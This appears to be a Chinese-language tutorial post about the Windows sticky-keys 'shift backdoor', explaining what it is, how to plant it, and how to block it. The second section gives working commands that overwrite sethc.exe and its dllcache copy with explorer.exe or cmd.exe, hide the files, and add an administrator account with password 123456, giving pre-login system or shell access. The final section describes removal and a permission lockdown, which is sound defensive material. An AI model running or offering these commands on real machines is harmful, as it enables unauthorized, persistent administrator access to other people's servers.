一、什么是shift后门?
shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。
其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞键,已进入服务器的系统程序管理器。
二、shift后门的制作?
其制作有很多种,下面介绍一种常用的,可以明白其原理自己扩展:
在cmd窗口,敲打命令如下:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。
(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)
使用命令:
net user admin 123456 /add && net localgroup administrators admin /add
执行上面的命令,便可以创建一个叫admin的用户,密码为123456.
三、shift后门的禁止?
两种方法:
第一种:直接删除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择”显示所有文件和文件夹”把”隐藏受系统保护的操作系统文件”的选择取消才能看得到).这种方法不能完全解除,当服务器重启后,还是会出现后门。
第二种(建议使用这种方法):使用权限来约束这两个文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择”显示所有文件和文件夹”把”隐藏受系统保护的操作系统文件”的选择取消才能看得到). 在权限里设置为所有用户(Everyone)禁止运行。具体操作步骤如下:
1.找到C:\WINDOWS\system32目录下的sethc.exe文件,打开属性:
点击”高级“,去掉“允许父项的继承权限传播到该对象和所有子对象”的勾。
点击”添加“,在出现的选择用户和组中点击”立即查找“,在搜索结果中找到”Everoy“用户,并确定:
点击确定:
继续确定,将”Everoy“用户的权限设置为全部拒绝:
这样就禁止了安装和在此访问。当再次安装和访问时,就会出现拒绝访问:
最新评论